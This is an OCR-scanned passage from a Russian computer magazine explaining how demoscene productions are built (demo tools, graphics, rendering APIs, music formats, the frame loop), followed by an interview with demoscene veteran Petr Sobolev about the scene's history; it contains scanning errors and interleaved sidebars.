темы — это специализированные программы-обо- 
лочки, которые посредством графического интер- 
фейса создают скрипты демок. Такие демо-системы 
в результате экспортируют исполняемый файл пле- 
ера и набор скриптов. Сам скрипт содержит инфор- 
мацию в стиле «что, как и когда показывать» и поль- 
зовательские медиаданные. Демосистемы бывают 
очень разные. Для работы с каждой из них тебе бу- 
дет необходимо прочитать мануалы и разобраться 
в туториалах (может, еще не поздно почитать книж- 
ку про C++?). С большим отрывом функциональнос- 
ти и качества лидирует система Werkkzeug. Просто 
обалденная штука (при правильном применении :)). 
Список поддерживаемых фич можно перечислять до 
конца статьи. От демомейкера не требуется ничего, 
кроме его креатива. Для оценки масштаба трагедии 
смотрим потрясающую работу от Farbrausch — fr-025 
(на соответствующих картинках). 

Между прочим, на сайте \\/7 именно этот про- 
ект лежит в исходниках и полностью доступен 
для скачивания и «ковыряния»! Полноценные и «съ- 
едобные» русскоязычные туториалы по \\/7 прита- 
ились на сайте www.vova4age.narod.ru. Еще одним 
классическим примером демосистемы является 
Морру Demopaja. Но, в отличие от WZ, Demopaja не 
таскает «все в одном флаконе», и тебе придется 
пыхтеть и писать специальные плагины для твоих 
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супер-пупер эффектов самому (зато редактор сцен 
и сплайнов удобный). Кроме этого, советую обра- 
тить внимание на демосистему пеоп \2 от группы 
xplsv и отечественный Opensource-npoekt Plasticator. 

Если у тебя есть опыт программирования или 
море амбиций и ты пишешь свою самую первую дем- 
ку, то советую забыть про все сторонние демосисте- 
мы. Пиши все свое: так ты быстрее осознаешь, что 
именно тебе необходимо, не забивай свою голову чу- 
жими бреднями — у тебя своих хватает. У меня есть 
пара знакомых личностей, которые убивают боль- 
шую часть времени и сил на написание инструмента- 
рия и демосистемы, чем собственно на саму демку. 
> — графика. Графика в демке может быть раст- 
ровой и векторной. Растровая графика рисуется 
в редакторах а-ля Фотошоп, а вот с векторной все 
несколько сложнее. Для хранения растровой гра- 
фики любого содержания нам хватит PNG и JPG, 
а вот форматов векторной графики — тьма, ведь 
каждый редактор сохраняет ее в своем формате. 
Стандартом де-факто является 30$. Для всех ос- 
тальных «тяжелых случаев» существуют програм- 
мы-конверторы векторных графических файлов 
(очень хороший пример — Deep Exploration). 

Но это все теория, а на деле матерые демо- 
мейкеры частенько брезгуют стандартными фор- 
матами, выдумывая свои. И правильно делают! Это 
позволяет делать код более гибким, использовать 
легковесный загрузчик и оптимизировать данные 
под конкретные задачи. 

Загрузить растровое или векторное изобра- 
жение можно с помощью различных библиотек. Как 
вариант — написать самому, но стоит ли изобре- 
тать велосипед? На том же www.sourceforge.net есть 
множество библиотек для загрузки данных любых 
форматов. И, вспоминая боянистую фразу на ярлы- 
ке мужской рубашки «dry wash only, 40 °C, no bleach, 
inside out, no machine washing — OR — just give it to 
your wife — it’s her job», все остальное скидываем на 
художника. Это его работа — рисовать и сохранять 
в правильный формат. Если будет сопротивляться, 
то покажи ему, кто в доме хозяин ;). 

Вершиной искусства демомейкинга является 
генерация изображений текстур исключительно 
посредством кода. Тут речь идет не о простых гра- 
диентах с шумом, а именно о сложных изображе- 
ниях. Остановимся на этом моменте и идем смот- 
реть 64кб интру Fr-08: The Produkkt (соответствую- 
щая картинка). 

Смотрим до самого конца и внимательно вни- 
каем в цифры в титрах — впечатляет! Разобраться, 
как работают генераторы текстур, можно на отлич- 
ном примере проекта Александра Кухаренко (hi, 
fOx!) — «Plasticator» (http://plasticator.heroez.net). Вооб- 
ще говоря, этот проект — полноценная отечествен- 
ная демосистема, на которой были сделаны различ- 
ные интры и демки, но нас на данной стадии будет 
интересовать только то, каким образом можно по- 
лучить сложные рисунки посредством минимума 
кода. Копаем исходники, крутим кнопки — осозна- 
ем how to. Дельфинам, да и остальным, рекоменду- 


Инициализация Загрузка 
графической => Загрузка == глобальных данных, 
подсистемы музыки 
} 
Генерация 
текстур, сэмплов, 
геометрии 
i 
Дополнительная 
загрузка данных 
для конкретной сцены 
Vv 
Цикл-диспетчер Определение 


проверяем клавиатуру 
и время на тему 


текущего времени 
для данного кадра 


«не пора ли нам 
выходить» 


Считаем, какие сцены 
нам надо рисовать 
в этом кадре 


Сцена, которая принимает 
локальный параметр — 
локальное время 


м 


Микшируем Еще одна сцена, 
al отрендренные сцены, — в количестве от 0 
постпроцессинг до вашей фантазии 
Культурно убираем и прочие радости 
за собой весь мусор 
выход! 


Схема реализации 


ется посмотреть интересный проект www.ainc.de — 
«Texture» 

Онтакже укомплектован сорцами и крайне поз- 
навателен. Функциональные возможности, конечно, 
не фонтан, по сравнению с «Plasticator», но все более 
чем съедобно. Использование генерируемых текстур 
радикально изменяет размер демки на носителе. 
> Kak все это показать на экране? Процесс от- 
рисовки картинки на экране называется рендерин- 
гом. Рендеринг может быть программный (software) 
или с помощью средств графических библиотек 
OpenGL / DirectX (hardware accelerated). 

Софтварный рендер попиксельно обрабаты- 
вает картинку, используя вычислительные мощ- 
ности центрального процессора. Различают обыч- 
ный софтварный рендер и рейтрэйсинг (raytracing). 
В первом случае изображение получается путем 
растеризации полигонов с учетом освещения 
и текстурирования по так называемым сканлай- 
нам (scanlines), а во втором случае изображение 
получается путем расчета виртуальных лучей 
с учетом физики отражения, преломления и ослаб- 


ления света. Первый способ позволяет получить 
достаточно качественную картинку с приличным 
количеством полигонов, зато рейтрейсер может 
сгенерировать значительно более реалистичную 
картинку с эффектами, недоступными даже са- 
мым-самым современным видеоакселераторам. 
Доступ к возможностям видеоускорителя осу- 
ществляется через библиотеки OpenGL и DirectX. 
Возможности последних версий OpenGL и DirectX бо- 
лее чем сравнимы, хотя, с моей точки зрения, DirectX 
более programmer-friendly. Он поддерживает больше 
форматов файлов, интерфейсов для структур дан- 
ных. Доступ к расширенным функциям также значи- 
тельно проще в DirectX, зато OpenGL является 
действительно кроссплатформенной библиотекой. 
Доступ к расширенным функциям видеоускорителя в 
OpenGL осуществляется через так называемые рас- 
ширения, что значительно усложняет написание ко- 
да. Хотя вру. Не усложняет, а увеличивает количест- 
во телодвижений. В минус API OpenGL версий ни- 
Же 2.0 идет также отсутствие возможности использо- 
вания текстур размера, не кратного степени 2. Для 
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любителей «хочу все и сразу» есть такие извращения 
как SDL (Simple DirectMedia Layer, www.libsdl.org) — 
кроссплатформенная тулза, позволяющая писать 
мультимедийные приложения. «Простой доступ 
к мультимедийным возможностям» обернется для 
нас необходимостью досконально изучить не только 
API самого SDL, но и OpenGL, и всего остального, 
поскольку когда-нибудь обязательно захочется ра- 
зобраться во всем изнутри ;). В такие моменты ты 
должен держать под рукой книжечку по С++ 
и OpenGL/DirectX. Выход из ситуации, когда хочется 
высокого качества картинки, но лениво разбираться 
в тонкостях низкоуровневых библиотек — сторонние 
ЗО-рендеры. Их очень много и они все очень разные, 
но, как показывает практика, в большинстве случаев 
написать собственный движок для демки намного 
проще и перспективнее, чем тратить время на изуче- 
ние устройства чужого кода. Так что настоятельно ре- 
комендую тебе писать все свое. 

Таким образом, можно выделить три типа 
рендера — когда код демки не знает, чем его будут 
отрисовывать и общается только через прослойку 
графического движка; когда графического движка 
нет как такового, но есть набор структур данных 
и мелкие куски кода для работы с ним; и когда весь 
код прорисовки на уровне АР! находится прямо 
в коде демки. Первый способ наиболее правиль- 
ный с точки зрения программного подхода. Необ- 
ходима new feature? — добавь означенную фичу 
в сорцы рендера. Второй способ, когда вызовы АР! 
намешаны в коде демки со всем остальным, позво- 
ляет значительно ускорить процесс разработки, но 
требует несколько большей квалификации прог- 
раммиста. Третий способ пригоден только для то- 
го, чтобы показать, что он существует и не должен 
использоваться — сложность разработки, огром- 
ный размер исходного кода, — и это только начало 
внушительного списка его «бонусов». 

Графический тулкит любого демомейкера 
должен включать в себя как минимум документа- 
цию и примеры. В дальнейшем ты добавишь в этот 
список свои наработки, снипетсы и все остальное. 
Настоящей ОрепСЕ-Меккой стал сайт www.ne- 
he.gamedev.net. Простые и понятные уроки и статьи 
(с подробным построчным (!) описанием всего, че- 
го только можно) радуют уже не первое поколение 
кодеров, а каждый урок от МеНе можно рассматри- 
вать как отдельную мини-демку. Более того, приме- 


ры МеНе портированы на большое количество язы- 
ков программирования. В интернете существует 
также и русская версия уроков Мене — 
http://pmg.org.ru/nehe. Еще рекомендую очень хороший 
ресурс с мясистым именем хоста — hittp://ultimate- 
gameprogramming.com — сайт содержит действитель- 
но много примеров no OpenGL и DirectX. Примеры с 
UGP более продвинуты, чем на МеНе — есть HDR, 
различные ЗНадо\з-технологии, шейдеры, лайтма- 
пы, загрузка различных файловых форматов, да и 
культура кода у примеров намного выше. DirectX- 
разработчикам рекомендуется держать у себя на 
диске соответствующий SDK, но если в графике 
ты — начинающий, то разобраться в примерах 8-го 
или 9-го SDK поначалу будет очень сложно. 
>» — музыка. Дема без музыки это... полный бред! 
Сейчас мы рассмотрим, как хранить музыку, чем ее 
играть и, вообще, зачем это все надо. 
Технологически музыка в демках бывает 
MIDI, модульная, синтезированная или потоковая. 
MIDI-cbopmat — онив Африке MIDI. В демках он ис- 
пользуется в чистом виде крайне редко. Учитывая, 
что есть много более эффективных способов, со- 
ветую забыть про него вообще. Не стоит, конечно, 
опускать MIDI до уровня грязи, это всего лишь фор- 
мат файла и его можно проиграть через очень на- 
вороченный синтезатор, получив таким образом 
потрясный саунд. Но для демомейкинга он не под- 
ходит :). Исторически первым типом музыки в дем- 
ках были музыкальные модули. Модуль — 
это файл, который хранит внутри себя образцы 
звуков инструментов (сэмплы) и ноты, которые не- 
обходимо сыграть этими инструментами. Модули 
создавались в специальных программах — трекке- 
рах. Треккер представляет собой программу, в ко- 
торой можно редактировать модули в виде верти- 
кальных дорожек с нотами (паттернов) и осущест- 
влять управление сэмпламии и эффектами. 
Классический модульный формат это МОП: 
монофонические сэмплы по 8 бит и возможность 
воспроизвести максимум 4 звука одновременно. 


«the.popular.demo» от Farbrausch 


В ЧЕМ ХРАНИТЬ ЗВУК 
В ДЕМКАХ? 


Модуль 

{+} занимает мало места. Не требует высоких 
вычислительных мощностей 

{-} подходит только для чистой музыки 


Поток 

{+} любое содержание, хоть 10-минутная запись 
чихающей больной обезьяны. Не требователен 
к вычислительным ресурсам и памяти 

{-} высокое качество — большой размер файла 


Синтезатор 

{+} исключительное качество звука, если руки 
не кривые 

{-} сложность реализации и значительно более 
высокие системные требования 
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ПОПУЛЯРНЫЕ 
ДЕМОТУЛЗЫ 


{Werkkzeug} 
www.theprodukkt.co 
all-in-one, включая 
даже средство OT 
комаров 


{Морру Demopaja} 
http://demopaja.org 
удобное управление 
сценами, но халтура 
не пройдет — все plug- 
in'bl придется написать 
самому 


{Neon v2} 
http://neonv2.com 

к демосистеме 
существует большое 
количество плагинов 
и эффектов, но другие 
варианты более гибки 
и функциональны 


{Plasticator} 
http://plasticator.heroez.ne 
отечественный проект, 
предлагает очень 
многое и сразу, 
главное — 

не запутаться 

в интерфейсе 


Современные модульные форматы позволяют прак- 
тически забыть о таких рудиментарных ограничени- 
ях параметров сэмплов и количества воспроизводи- 
мых одновременно каналов. Модульная музыка поз- 
воляет получить высокое качество звучания (даже 
выше чем Mp3-style форматах). Смотрим и внима- 
тельно слушаем качество саундрека в демках с мо- 
дульной музыкой: Haujobb — «disclone» и «наш» от- 
вет буржуям: T-Rex — «broadband». Наиболее pacn- 
ространены у демомейкеров следующие форматы 
модульной музыки: IT — Impulse Tracker v2.14, ХМ — 
FastTracker 2. Обе программы еще DOS'oBcKux Bpe- 
мен, хотя есть и win+linux клоны для IT — Schism 
tracker, для ХМ — Fast Tracker 3. Типичный размер 
музыкального модуля 200-2000 Кб. 

Тем временем мощности компьютеров росли 
(и растут) постоянно. Кто-то сказал: «А почему бы и 
нет?» и сделал синтезатор для ПК. Синтезатор гене- 
рирует огибающие по некоторым законам и приме- 
няет к ним различные фильтры, дэлэи и эффекты. 

В демке тебе будет необходимо хранить код 
самого синтезатора (плеера) и набор параметров 
к нему. Это хозяйство занимает очень мало места, 
что нам, безусловно, на руку. Синтезатор позволяет 


получить исключительно высокое качество звука, но 
требует значительных вычислительных ресурсов 
(фразу после запятой в 21 веке принято опускать, да 
и никто не отменял prerendering). Для тех, кто не Be- 
рит в качество синтезаторов, — качаем и слушаем 
демки: Farbrausch — «fr-34», AOS — «offworld» (меж- 
ду прочим, работа-победитель демопати CC-2006 
в Питере, hi to Preston & UNC!). Подробное описание 
работы музыкального синтезатора явно выходит за 
рамки этой статьи, да и рассказывать об этом долж- 
ны люди, которые сами писали синтезаторы, так что 
ищем все в интернете. А завершают разнообразие 
форматов музыки в демках потоковые форматы: 
mp3, ogg, wma. Что именно выбрать — решать иск- 
лючительно тебе. В абсолютном большинстве сов- 
ременных демок используется потоковый формат 
музыки. Так быстрее, удобнее и никто не украдет 
сэмплов из наших модулей :). Ударить по звуковым 
рецепторам помогут саундтреки из демок: mfx — 
«deiteies», kKewlers — «a significant deformation near 
the cranium». 

В воспроизведении саундтрека нет ничего 
сложного. Конечно, самые смелые и опытные прог- 
раммеры пишут все сами, но нет ничего зазорного 
в использовании качественных сторонних инстру- 
ментов. Наиболее распространены библиотеки 
Bass (кстати, эту библиотеку я когда-то описывал на 
страницах Кодинга — прим. Лозовского) от lan Luck 
и fMod от Firelight multimedia. Обе абсолютно бес- 
платны для некоммерческих приложений и предла- 
гают в целом одинаковый набор функций. В этих 
библиотеках есть врапперы под все основные язы- 
ки программирования и платформы. Используя эти 
библиотеки, ты легко проиграешь свои модули или 
тр3’шки даже не задумываясь о том, какой звуко- 
вой адаптер у тебя стоит. Дополнительно Bass под- 
держивает компрессированные с помощью техно- 
логии тред музыкальные модули МОЗ, а fMod мне 


Интра Fr-08 : « The Produkkt» 


нравится NO причине простоты синхронизации. Kpo- 
ме того, есть версия MinifMod, которая использует- 
ся для проигрывания модулей в малоразмерных 
демках и интрах с синтезированными сэмплами. 
А ВОТ С «чистыми» синтезаторами сложнее. В раз- 
деле demotools на www.pouet.net есть рибс-синтеза- 
торы, но они все очень разные, и перед реальным 
использованием придется их досконально изучать. 
>  каквсе это работает вместе? Сейчас я попро- 
бую рассказать о TOM, как работает депейс-демка 
на функциональном уровне. По ходу объяснения 
уменя будет появляться желание писать сразу кус- 
ки кода, но я переборю себя и попробую 
растолковать взаимодействие различных элемен- 
тов демки на уровень выше, а конкретные примеры 
реализаций ты подсмотришь сам из примеров 
NeHe. Для начала — посмотри на картинку «Схема 
реализации». 

Все начинается с инициализации графической 
подсистемы. Можно сначала загрузить данные, но 
как ты тогда нарисуешь красивый progressbar? Поэ- 
тому будем последовательны. Хорошим тоном явля- 
ется предоставление пользователю возможности до 
запуска демки выбрать хотя бы разрешение экрана. 
Как вариант — можно сделать отдельный конфигу- 
ратор (отдельная программа), а демка будет уже за- 
пускаться по активным настройкам. Если ты пи- 
шешь 64К или просто ленив, как сытая анаконда, то 
скомпилируй несколько .ехе с различными настрой- 
ками. Например, demo_fullscreen.exe и demo_win- 
dow.exe. Однако что-то мы отошли от сути. 

При инициализации обязательно смотри на ко- 
ды возврата ошибок. Лучше определить возможнос- 
ти системы пользователя заранее, чем заставлять 
его ждать процесса загрузки и первого «вывалива- 
ния» по ошибке. Для OpenGL самая ответственная 
часть — это выбор pixelformat. Также подводный Ka- 
мень можно найти при установке полноэкранного 
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видеорежима — не стоит прыгать в видеорежим с 
custom framerate. Переключайся на любой доступ- 
ный режим с данным разрешением. Проще гово- 
ря — не надо 640x480 @ 100, надо 640x480 @ default. 
Следующий шаг — загрузка данных. Данные 
можно хранить в отдельных файлах, в больших $т- 
gle-file паках, в .exe-pecypcax или даже в сегменте 
кода. Как именно — решать тебе. Если хранить 
внутри .ехе, то не надо думать насчет упаковки — 
всегда есть UPX или ASPack. Хорошим решением 
является хранение данных в популярных архивных 
форматах ZIP, RAR. В таком случае тебе понадо- 
бится соответствующая библиотека декомрессии. 
Как пример можно привести unique — unRar library 
(http://www.unrarlib.org). Должен сразу предупредить 
тебя, что делать временные файлы при распаковке 
и загрузке демки — это страшное зло. Хотя, если ты 
культурно получишь системный temporary file, To... 
Нет, все равно зло. Наша демка должна распаковы- 
вать все сразу в память, так, чтобы ее можно было 
безболезненно запускать даже с компакт-диска. 
Следующий элемент — чаще всего, самый 
сложный для новичков. Перед тем как начинать пи- 
сать свою демку, я настоятельно рекомендую тебе 
попробовать написать тетрис (через это должен 
пройти каждый программист :) — прим. Лозовского). 
Да-да, именно обыкновенный тетрис. Очень много 
схожих элементов, да и опыта программирования 
это добавит. Я серьезно! Отмазки в стиле «я рабо- 
таю только с базами данных, зачем мне этот тет- 
рис?» плохо скрывают то, что человек на самом де- 
ле даже не представляет, как это делается. Позво- 
лю себе и тут ввернуть несколько полезных советов. 
В начале каждого нового кадра мы должны уз- 
нать текущее время от начала проигрывания музыки. 
Если ты используешь fMod, то он может отдать нам 
текущее время в проигрываемом файле, для других 
случаев надо использовать gettickcount или 
QueryPerfomanceTimer с учетом стартового тика. Точ- 
ность Gettickcount плавает от системы к системе 
в злом диапазоне до 10 м, что представляет собой 
максимум 100FPS, а RTDS не поддерживается на 
процессорах ниже iP3, да и на ноутбучных мобильных 
камешках частенько отмачивает еще те приколы. 
Далее мы находим ту сцену, которая должна 
быть видна в конкретный момент времени и рисуем 
ее. Обрати внимание, что наиболее удобно вызы- 
вать сцену в ее локальном времени. Например, вре- 
мя на начало кадра — 13.5 секунды, а сцена должна 
идти с 10-й секунды по 15-ю. Итого: мы передаем 
этой сцене значение времени в интервале от 0 до 
1, — для данного примера это будет (13.5-10)/(15- 
10)=0,7. Использование нормализированного ло- 
кального времени очень удобно. Дальше — больше! 
В прямом смысле. Если делать плавные переходы 
между сценами или «месиво» из нескольких сцен, то 
необходим дополнительный менеджер сцен или 
виртуальная сцена, которая ничего не будет делать, 
кроме как вызывать из себя прорисовку других сцен 
и смешивать результат, а в самом конце этого эле- 
мента можно сделать итоговый постпроцессинг, 


например, модный нынче glow\bloom. Далее — быст- 
ренько смотрим, нажал ли мерзкий юзер клавишу 
Esc, и не закончилась ли еще музыка. Если нет — 
повторяем весь цикл отрисовки кадра. 

А для того, чтобы оставить хорошее впечат- 
ление от просмотра и при этом не оставить «хвос- 
тов» в памяти — аккуратно убираем за собой, хотя 
если «бросить» девайсы, контексты и текстуры 
в D3D или OpenGL — то ничего страшного не слу- 
чится. Но будем культурнее :). Хотя бы чуть-чуть. 
> conclusion или несколько слов вдогонку. Так 
уж получилось, что наше описание внутренностей 
демки вышло достаточно сумбурным, в стиле «га- 


ВЕСЬ СТАФФ И ДЕМКИ К ЭТОЙ СТАТЬЕ 


ПРИМЕРЫ РЕНДЕРОВ 


{1} софтвар 

matrix — «the fulcrum» — потрясающий софтварный 
рендер образца конца 90-х. Чувствуется, 

что возможности детализации изображения 
диктовались лишь существующими 166mhz пнями. 
Динамическое освещение, тени, объемный свет, 
анимация моделей — и все это считается только 
на процессоре! 


{2} рэйтрейсер 

fan — «still sucking nature» — год выпуска 2003, 

но даже сейчас это нечто! В информации по проекту 
создатели утверждают, что пытались сделать 
именно фотореалистичную картинку в реальном 
времени. 


{3} хардвар 

«rgba» — paradise, просто красивая небольшая 
интра с почти живой травой и настоящими 
носорогами! Всего лишь 56 кб! 


лопом-по-Европам». Но не боги горшки обжигают, 
да и демки, пусть даже самые крутые, делают са- 
мые обыкновенные талантливые люди. Даже ес- 
ли ты не программист и не представляешь в дета- 
лях how does it work — ничего страшного: есть раз- 
личные демосистемы, где от тебя будет требо- 
ваться только креатив и клики мышкой в нужных 
местах. Главное — это желание творить. А статья, 
в которой я самым подробным образом разберу 
программирование демки, ждет тебя в этом же но- 
мере. Кстати, менее чем полгода отделяет нас от 
ближайших российских демопати: DiHalt в Нижем 
и ChaosConstructions в Питере... © 


ЖДУТ ТЕБЯ НА НАШЕМ КОМПАКТ-ДИСКЕ 
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интервь 
с Петром 
Соболевым 


ПРЕДСТАВЛЯЕМ ТВОЕМУ ВНИМАНИЮ ИНТЕРВЬЮ 

С НАСТОЯЩИМ СТАРОЖИЛОМ ОТЕЧЕСТВЕННОЙ ДЕМО- 
СЦЕНЫ. НЕ БУДУ РАСКРЫВАТЬ ВСЕХ СЕКРЕТОВ СРАЗУ, 
ЛИШЬ СКАЖУ, ЧТО НА ОТЕЧЕСТВЕННОЙ СЦЕНЕ 

ОНС 1993 ГОДА И ИМЕЕТ ОТНОШЕНИЕ К САМЫМ 
ЗНАКОВЫМ ВЕХАМ ЕЕ ЖИЗНИ 

Интервью брал 

Александр Лозовский 


О: Приветствую! Предлагаю такой план беседы: 
сначала о тебе, затем — о демосцене в целом, 

и наконец — о тебе и о демосцене. 

А: Давай, спрашивай. 

О: Для начала — имя, фамилия, профессия. 

A: Петр Соболев, занимаюсь IT в широком смысле 
слова. Отчасти руковожу, отчасти сам занимаюсь 
программированием, дизайном. Преимуществен- 
но для интернета. Возраст — 33 года. 

О: Расскажи кратко о себе в плане отношения 

к демосцене, чтобы читателю стало ясно, почему 
я беру интервью именно у тебя. 

А: Давно, в 1993 или 1994 году мы с друзьями ор- 
ганизовали группу Realm Of Illusion и выпустили 
несколько вещей — в частности, электронный 
журнал (diskmag) «INFUSED BYTES», кое-какие 
intro, утилиты. 

В 1995 организовали и провели первую в 
бывшем CCCP demo party — ENLIGHT'95 (Санкт- 
Петербург). 

О: Весьма органично разговор перешел в русло 
истории демосцены в России. Вы были 
первооткрывателями? 

А: Мы открыли двери именно для demo party в Poc- 
сии. Но что касается intro и demo, то первые инте- 
ресные российские работы — не наши, увы. 

О: Интро — имеются в виду графические заставки 
для прог и крэков? 

A: Не совсем. Таковыми они были в изначальном, 
оригинальном понимании этого слова. Еще на 8- 
битных машинках — Commodore 64, Amiga. На PC 
понятие intro уже означало самостоятельную ма- 
ленькую demo. 

О: А что известно про первую русскую интро, 
дему? Или есть только предположения? 

А: Это как с первым человеком на Земле. Ничего 
не могу точно сказать. Просто потому, что граница 
между каким-то запрограммированным простень- 


ким видеоэффектом и интро/демо — очень нечет- 
кая. Лично мне из старых отечественных работ за- 
помнилась Fireworks и Cross. 

О: Кстати, мне, как человеку, начинавшему 
работу за ЭВМ как раз с Микрош и Коммодоров, 
интересно немного послушать про интры для них. 
Нет ли чего особо запомнившегося? 

А: Я сам начинал с Commodore 64. Микроши и Спект- 
румы как-то обошли стороной (хотя я их видел, 
представлял, как они устроены и даже немного 
программировал на них). 

На C64 есть много очень хороших работ, но бо- 
юсь, что мало кому их названия что-то скажут (да ес- 
ли даже и скажут, по теперешним временам они 
смотрятся несколько странно). Могу назвать Place in 


Space группы Taboo, Red Storm by Triad, Wonderland, 
Lights by Censor Design, Legoland by Fairlight. 

О: Если уж говорить об олдскульных временах, TO 
как ты относишься к демкам в вирусах? Помню, 
видел что-то подобное в 90-х, только названия не 
сохранил. Может, расскажешь о парочке? 

А: Впервые слышу про такое. Но поскольку к виру- 
сам я отношусь отрицательно (думаю, что их авто- 
ры просто избрали себе путь попроще), то и к дем- 
кам в них хорошо отнестись не смогу. 

О: Трудно согласиться по поводу простого пути, 
если учесть сложность полиморфиков тех 
времен... Что скажешь по поводу знаковых фигур 
демомейкинга на Коммондоре? Общался с кем-то 
лично? Расскажи. 


А: Шедевры есть в любых областях. Но если смот- 
реть в целом, то это способ быстро увидеть влия- 
ние своей «работы» на широкий круг людей. В ка- 
ком-то смысле это приносит удовлетворение. Не 
могу я одобрить такого рода деятельность. Вер- 
немся лучше к демкам. Что касается фигур: из за- 
рубежных персон я в те времена брал интервью 
(для iNFUSED BYTES) у Bacchus/Fairlight. Потом 
переписывался с GORE/Future Crew (он тогда был 
организатором Bo Future Crew, а известный сейчас 
организатор Assembly — Abyss — был сисопом 
ВВ$). Но это было, когда я уже перешел на РС. 
На Commodore 64 просто не было способов связи 
кроме телефона (междугородние звонки были нам 
не по карману) и почты (по ней GhostRider, мой 


знакомый, иногда пересылал 5.25" дискеты). Мо- 
демы на Commodore 64 были обычно на 160-300 
бод, да и то малодоступны. 
О: Кстати, было бы здорово залить старые 
номера твоего журнала на наш диск. Я думаю, 
у многих читателей это вызвало бы слезу 
ностальгии. А что насчет РС? Насколько бурную 
деятельность ты развил, перейдя на эту 
платформу? 
А: Собственно, все, о чем я говорил в плане рели- 
зов Realm Of Illusion — это было именно Ha РС. На 
C64 я лишь осваивал компьютер, изучал Assembl- 
ег (процессора 6510), другие языки. 

Что касается журналов, то они доступны 
на http://www.enlight.ru/roi, но запустить их на совре- 
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менном РС — дело гиблое. Тогда демки и другие 
программы писались так, чтобы максимально эф- 
фективно использовать возможности слабых 
компьютеров. А это программирование на низком 
уровне — запись и чтение из портов, расчет, 
сколько тактов займет та или иная инструкция... 
О: То есть в плане демомейкинга ты был скорее 
кодером? Если тогда вообще было такое 
разделение на кодеров ит.д. 
А: Разделение было. Да — скорее кодером. Точно 
не музыкантом :). Рисовать шрифты и кое-какие 
картинки приходилось, но редко. Графикой у нас 
занимался Lord Ville (Aux), а музыкой — Jumbo 
BigBug и Wind Dragon. 
О: Меня вечно тянет на олдскул: давай поговорим 
о программировании в то время. Ты начал 
с Ассемблера под РС? А на более высоких 
языках приходилось писать демы? 
А: Я начинал с BASIC на C64. Тогда почти все с не- 
го начинали, и мне кажется, это неплохо. Может 
быть, он не дает какого-то академического стиля, 
но зато развивает гибкость мышления, и можно 
сразу видеть результат. Затем Ассемблер 
6510/6502 на том же С64. После перехода наРС — 
Ассемблер x86 и Pascal. Немного — Forth. 
Маленькие интро писались сразу на Ассемб- 
лере, а что касается журналов, — то это был Пас- 
каль с ассемблерными вставками. 
О: Так я же обожаю Паскаль! Asm и InLine вечно 
пребудут в нашей памяти. Насчет журналов: 
ты имеешь в виду интерфейс? 
A: Не только. Я, воспитанный в традициях C64, пы- 
тался следовать примеру старших товарищей. Де- 
ло в том, что электронные журналы (diskmags) на 
C64 содержали далеко не только тексты. Обяза- 
тельное интро в начале, красивое меню, появле- 
ние текста с разными эффектами, музыка — все 
это требовало не меньшего (а точнее — большего) 
времени, чем подбор материалов. 
О: И кто после этого скажет, что Паскаль — для 
студентов?! Ну что же, наверное, хватит олдскула, 
перейдем в более поздние времена. Ты можешь 
отметить основные вехи в истории демомейкинга? 
Или же это процесс непрерывный, хоть 
и связанный с прогрессом компов? 
А: Четкие вехи были. По большей части они связа- 
ны со сменой платформ. Основная ветвь выглядит 
так: Commodore 64— Commodore Атюа-» IBM PC. 
Конечно, это не означает, что на других 
платформах не было демосцены (скажем, в Рос- 
сии вообще большая часть всего, связанного с де- 
мо, была написана для ZX Spectrum). Но все-таки 
основная мировая культура и традиции демосце- 
ны сформировались на этих трех платформах. 
Началось все Ha C64. Но из-за аппаратных 
ограничений демо в современном виде (то есть 
нечто с непрерывным действием, синхронизацией 
с музыкой, трехмерными сценами) просто не мог- 
ли возникнуть. 
С появлением Commodore Amiga многое из 
этого стало возможным (основной шаг — track- 


то — демо в виде динамичного клипа, который 
смотрится «на одном дыхании»). 

РС принес на демосцену аппаратную несов- 
местимость (все машины чем-то отличаются), 
мощный процессор, много памяти. А также (и это 
оказало сильное влияние) — общедоступный ин- 
тернет, то есть возможность легко обмениваться 
опытом и исходниками. Я бы даже сказал — тира- 
жировать их. 

О: А сейчас-то амижники живы? Наверное, живы 
и процветают? У меня есть знакомый 
спектрумист, он так и сидит на своем спеке, 
пишет письма в инет через фидошный гейт. 

А: Живы, но я бы не сказал что процветают. В Рос- 
сии ни Amiga, ни Commodore 64 не прижились. C64 
было просто очень мало, а с Амигами получилось 
довольно странно — народу порядочно, но тех, кто 
может что-то создавать — единицы. 

Вот со Спектрумом в России совсем иная си- 
Туация — регулярно появляются демки. 

А на Западе до сих пор пишут как для Сот- 
modore 64, так и для Amiga. Конечно это уже фана- 
тство, но, тем не менее, работы регулярно появля- 
ются. Спектрум там, с точки зрения демосцены, 
как-то не особо прижился. На его месте был С64. 
О: Согласен абсолютно: по количеству клонов 
Спекки мы впереди планеты. А что же c PC? Какой 
период в демомейкинге был самым плодотворным? 
Что-то говорят про «Золотой век», который 
закончился, а теперь — чуть ли не закат сцены... 
А: Думаю, что интересным был период первых 
Assembly — 1992, 1993 года. Как с точки зрения 
РС, так и сточки зрения Amiga. 

Тогда эти две платформы действительно со- 
ревновались между собой. 

State of the Art Ha Amiga, Second Reality на 
РС — многим знакомы эти названия. 

Потом был довольно серьезный провал, я бы 
даже сказал — разочарование. Многие просто 
штамповали демки на основе чужих исходников и 
копировали увиденные ранее эффекты и идеи. Но 
вот последние годы наблюдается новый подъем. 
Широко распространились мощные видеокарты, и 
intro/demo стали напоминать полноценные виде- 
оклипы, а порой даже фильмы. 

О: Последние годы — это 05-06? То есть ты 
считаешь, что современные демы — это скорее 
заслуга новых технологий? Или все-таки 
креативные идеи тоже имеют место? 

А: Я сказал, что технологии помогли сделать этот 
скачок. Но, разумеется, свежие идеи тоже присут- 
ствуют. Просто теперь они лежат в другой плоскос- 
ти. Раньше идеи вертелись вокруг того, как, не 
имея ни мощностей, ни хорошей графики, заинте- 
ресовать зрителя. И в расчет брали зрителя, кото- 
рый понимает, как устроен компьютер (например, 
имели смысл надписи типа «фигура из 12334457 
пикселов»). Сейчас это изменилось. Теперь рас- 
считывают просто на интересующихся. И слабо ог- 
раничены в средствах отображения. Демки стали 
ближе к видеоклипам и анимационным роликам, но, 


конечно, все равно они от них весьма далеки (снова 
по тем же причинам — аппаратные ограничения). 

Лично я считаю примерами работ этого но- 
вого поколения — The Popular Demo, Paradise. 

О: А из демомейкеров/команд кого бы ты в наше 
время выделил? 

А: ВОВА, Farbrausch, Kewlers, Conspiracy, ASD, 
Plastic, MFX. 

О: Общался с ними? Расскажи кратенько о KOM- 
нибудь: что за люди, какое образование 
получили, как дошли до такой жизни и чем, кроме 
демомейкинга, живут. 

A: Из отечественных общался с Crolyx, Fox. 

О: Кроликс — это же название команды? 

